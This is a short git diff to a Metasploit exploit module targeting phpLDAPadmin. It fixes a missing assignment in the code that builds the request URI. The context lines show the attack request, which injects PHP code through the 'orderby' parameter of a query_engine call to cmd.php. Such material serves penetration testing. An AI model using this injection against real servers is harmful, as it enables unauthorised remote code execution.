diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb index 6052a86061..100ff391de 100644 --- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb +++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "cmd=query_engine&query=none&search=1&orderby=#{php_code}\r\n\r\n" session = get_session - uri normalize_uri(datastore['URI']) + uri = normalize_uri(datastore['URI']) uri << '/' if uri[-1,1] != '/' uri << 'cmd.php'